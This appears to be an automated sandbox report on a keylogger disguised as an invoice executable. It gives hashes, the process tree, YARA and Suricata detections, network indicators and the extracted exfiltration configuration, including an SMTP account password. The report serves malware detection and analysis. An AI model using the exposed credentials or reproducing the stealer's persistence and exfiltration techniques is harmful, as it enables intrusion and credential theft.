Edit tour

Windows Analysis Report
Invoice No 1122207 pdf.exe

Overview

General Information

Sample name:	Invoice No 1122207 pdf.exe
Analysis ID:	1591868
MD5:	f4d3b326b29b4d0d8269499be0bc6b7f
SHA1:	f64f81909454b15dba91e95d5da9d7684cfc59f1
SHA256:	c3290e5cf7ebc77727f778129c3e235bbb23bdf2cc6136e4a442e7034da7abe5
Tags:	exeuser-James_inthe_box
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Generic Downloader

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Invoice No 1122207 pdf.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\Invoice No 1122207 pdf.exe" MD5: F4D3B326B29B4D0D8269499BE0BC6B7F)

ageless.exe (PID: 7660 cmdline: "C:\Users\user\Desktop\Invoice No 1122207 pdf.exe" MD5: F4D3B326B29B4D0D8269499BE0BC6B7F)

RegSvcs.exe (PID: 7800 cmdline: "C:\Users\user\Desktop\Invoice No 1122207 pdf.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 7980 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

ageless.exe (PID: 8028 cmdline: "C:\Users\user\AppData\Local\supergroup\ageless.exe" MD5: F4D3B326B29B4D0D8269499BE0BC6B7F)

RegSvcs.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Local\supergroup\ageless.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "cash@com12345", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "cash@com12345", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e32a:$a1: get_encryptedPassword 0x2e653:$a2: get_encryptedUsername 0x2e13a:$a3: get_timePasswordChanged 0x2e243:$a4: get_passwordField 0x2e340:$a5: set_encryptedPassword 0x2fa08:$a7: get_logins 0x2f96b:$a10: KeyLoggerEventArgs 0x2f5d0:$a11: KeyLoggerEventArgsEventHandler
0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c03e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b6e1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b93e:$a4: \Orbitum\User Data\Default\Login Data 0x3c31d:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef4d:$s1: UnHook 0x2ef54:$s2: SetHook 0x2ef5c:$s3: CallNextHook 0x2ef69:$s4: _hook
0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e32a:$a1: get_encryptedPassword 0x2e653:$a2: get_encryptedUsername 0x2e13a:$a3: get_timePasswordChanged 0x2e243:$a4: get_passwordField 0x2e340:$a5: set_encryptedPassword 0x2fa08:$a7: get_logins 0x2f96b:$a10: KeyLoggerEventArgs 0x2f5d0:$a11: KeyLoggerEventArgsEventHandler
00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c03e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b6e1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b93e:$a4: \Orbitum\User Data\Default\Login Data 0x3c31d:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef4d:$s1: UnHook 0x2ef54:$s2: SetHook 0x2ef5c:$s3: CallNextHook 0x2ef69:$s4: _hook
00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e12a:$a1: get_encryptedPassword 0x2e453:$a2: get_encryptedUsername 0x2df3a:$a3: get_timePasswordChanged 0x2e043:$a4: get_passwordField 0x2e140:$a5: set_encryptedPassword 0x2f808:$a7: get_logins 0x2f76b:$a10: KeyLoggerEventArgs 0x2f3d0:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.2527756944.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ageless.exe PID: 7660	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ageless.exe PID: 7660	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: ageless.exe PID: 7660	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: ageless.exe PID: 7660	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x51fb0d:$a1: get_encryptedPassword 0x51fe2c:$a2: get_encryptedUsername 0x51f927:$a3: get_timePasswordChanged 0x51fa30:$a4: get_passwordField 0x51fb23:$a5: set_encryptedPassword 0x522000:$a7: get_logins 0x521f63:$a10: KeyLoggerEventArgs 0x521bcc:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7800	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7800	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7800	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7800	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12fb63:$a1: get_encryptedPassword 0x12fe82:$a2: get_encryptedUsername 0x12f97d:$a3: get_timePasswordChanged 0x12fa86:$a4: get_passwordField 0x12fb79:$a5: set_encryptedPassword 0x132056:$a7: get_logins 0x131fb9:$a10: KeyLoggerEventArgs 0x131c22:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: ageless.exe PID: 8028	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ageless.exe PID: 8028	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: ageless.exe PID: 8028	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: ageless.exe PID: 8028	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x39eefc:$a1: get_encryptedPassword 0x39f21b:$a2: get_encryptedUsername 0x39ed16:$a3: get_timePasswordChanged 0x39ee1f:$a4: get_passwordField 0x39ef12:$a5: set_encryptedPassword 0x3a13ef:$a7: get_logins 0x3a1352:$a10: KeyLoggerEventArgs 0x3a0fbb:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 8060	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 8060	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.ageless.exe.1600000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.ageless.exe.1600000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.ageless.exe.1600000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.ageless.exe.1600000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c52a:$a1: get_encryptedPassword 0x2c853:$a2: get_encryptedUsername 0x2c33a:$a3: get_timePasswordChanged 0x2c443:$a4: get_passwordField 0x2c540:$a5: set_encryptedPassword 0x2dc08:$a7: get_logins 0x2db6b:$a10: KeyLoggerEventArgs 0x2d7d0:$a11: KeyLoggerEventArgsEventHandler
10.2.ageless.exe.1600000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a23e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x398e1:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b3e:$a4: \Orbitum\User Data\Default\Login Data 0x3a51d:$a5: \Kometa\User Data\Default\Login Data
10.2.ageless.exe.1600000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d14d:$s1: UnHook 0x2d154:$s2: SetHook 0x2d15c:$s3: CallNextHook 0x2d169:$s4: _hook
7.2.ageless.exe.1580000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.ageless.exe.1580000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.ageless.exe.1580000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.ageless.exe.1580000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c52a:$a1: get_encryptedPassword 0x2c853:$a2: get_encryptedUsername 0x2c33a:$a3: get_timePasswordChanged 0x2c443:$a4: get_passwordField 0x2c540:$a5: set_encryptedPassword 0x2dc08:$a7: get_logins 0x2db6b:$a10: KeyLoggerEventArgs 0x2d7d0:$a11: KeyLoggerEventArgsEventHandler
7.2.ageless.exe.1580000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a23e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x398e1:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b3e:$a4: \Orbitum\User Data\Default\Login Data 0x3a51d:$a5: \Kometa\User Data\Default\Login Data
7.2.ageless.exe.1580000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d14d:$s1: UnHook 0x2d154:$s2: SetHook 0x2d15c:$s3: CallNextHook 0x2d169:$s4: _hook
10.2.ageless.exe.1600000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.ageless.exe.1600000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.ageless.exe.1600000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.ageless.exe.1600000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.ageless.exe.1600000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e32a:$a1: get_encryptedPassword 0x2e653:$a2: get_encryptedUsername 0x2e13a:$a3: get_timePasswordChanged 0x2e243:$a4: get_passwordField 0x2e340:$a5: set_encryptedPassword 0x2fa08:$a7: get_logins 0x2f96b:$a10: KeyLoggerEventArgs 0x2f5d0:$a11: KeyLoggerEventArgsEventHandler
10.2.ageless.exe.1600000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c03e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b6e1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b93e:$a4: \Orbitum\User Data\Default\Login Data 0x3c31d:$a5: \Kometa\User Data\Default\Login Data
10.2.ageless.exe.1600000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef4d:$s1: UnHook 0x2ef54:$s2: SetHook 0x2ef5c:$s3: CallNextHook 0x2ef69:$s4: _hook
7.2.ageless.exe.1580000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.ageless.exe.1580000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.ageless.exe.1580000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.ageless.exe.1580000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.ageless.exe.1580000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e32a:$a1: get_encryptedPassword 0x2e653:$a2: get_encryptedUsername 0x2e13a:$a3: get_timePasswordChanged 0x2e243:$a4: get_passwordField 0x2e340:$a5: set_encryptedPassword 0x2fa08:$a7: get_logins 0x2f96b:$a10: KeyLoggerEventArgs 0x2f5d0:$a11: KeyLoggerEventArgsEventHandler
7.2.ageless.exe.1580000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c03e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b6e1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b93e:$a4: \Orbitum\User Data\Default\Login Data 0x3c31d:$a5: \Kometa\User Data\Default\Login Data
7.2.ageless.exe.1580000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef4d:$s1: UnHook 0x2ef54:$s2: SetHook 0x2ef5c:$s3: CallNextHook 0x2ef69:$s4: _hook
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e32a:$a1: get_encryptedPassword 0x2e653:$a2: get_encryptedUsername 0x2e13a:$a3: get_timePasswordChanged 0x2e243:$a4: get_passwordField 0x2e340:$a5: set_encryptedPassword 0x2fa08:$a7: get_logins 0x2f96b:$a10: KeyLoggerEventArgs 0x2f5d0:$a11: KeyLoggerEventArgsEventHandler
8.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c03e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b6e1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b93e:$a4: \Orbitum\User Data\Default\Login Data 0x3c31d:$a5: \Kometa\User Data\Default\Login Data
8.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef4d:$s1: UnHook 0x2ef54:$s2: SetHook 0x2ef5c:$s3: CallNextHook 0x2ef69:$s4: _hook
Click to see the 28 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , ProcessId: 7980, ProcessName: wscript.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7800, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49860

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , ProcessId: 7980, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\supergroup\ageless.exe, ProcessId: 7660, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T15:02:12.908495+0100	2803305	3	Unknown Traffic	192.168.2.10	49770	104.21.112.1	443	TCP
2025-01-15T15:02:16.603380+0100	2803305	3	Unknown Traffic	192.168.2.10	49796	104.21.112.1	443	TCP
2025-01-15T15:02:23.985692+0100	2803305	3	Unknown Traffic	192.168.2.10	49848	104.21.112.1	443	TCP
2025-01-15T15:02:25.821599+0100	2803305	3	Unknown Traffic	192.168.2.10	49859	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T15:02:04.408435+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:05.614594+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:06.957849+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:08.123712+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:09.292653+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:10.411397+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:12.302305+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:13.942643+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49775	158.101.44.242	80	TCP
2025-01-15T15:02:15.758577+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:16.954657+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:18.113309+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:19.317671+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:20.489534+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:22.273173+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:23.395876+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:25.255144+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49853	158.101.44.242	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T15:02:17.519042+0100	1810007	1	Potentially Bad Traffic	192.168.2.10	49803	149.154.167.220	443	TCP
2025-01-15T15:02:28.333913+0100	1810007	1	Potentially Bad Traffic	192.168.2.10	49873	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Invoice No 1122207 pdf.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\supergroup\ageless.exe

Avira: detection malicious, Label: DR/AutoIt.Gen8

Found malware configuration

Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "cash@com12345", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: 7.2.ageless.exe.1580000.1.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "cash@com12345", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\supergroup\ageless.exe

ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: Invoice No 1122207 pdf.exe	Virustotal: Detection: 33%			Perma Link
Source: Invoice No 1122207 pdf.exe	ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\supergroup\ageless.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Invoice No 1122207 pdf.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Invoice No 1122207 pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49758 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49829 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49873 version: TLS 1.2

Source:	Binary string: mscorlib.pdb source: RegSvcs.exe, 0000000B.00000002.2535081086.00000000059FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: ageless.exe, 00000007.00000003.1285842372.0000000004410000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000007.00000003.1284739949.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 0000000A.00000003.1403860642.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 0000000A.00000003.1403549159.0000000004680000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ageless.exe, 00000007.00000003.1285842372.0000000004410000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000007.00000003.1284739949.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 0000000A.00000003.1403860642.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 0000000A.00000003.1403549159.0000000004680000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0044C2A2 FindFirstFileExW,	0_2_0044C2A2
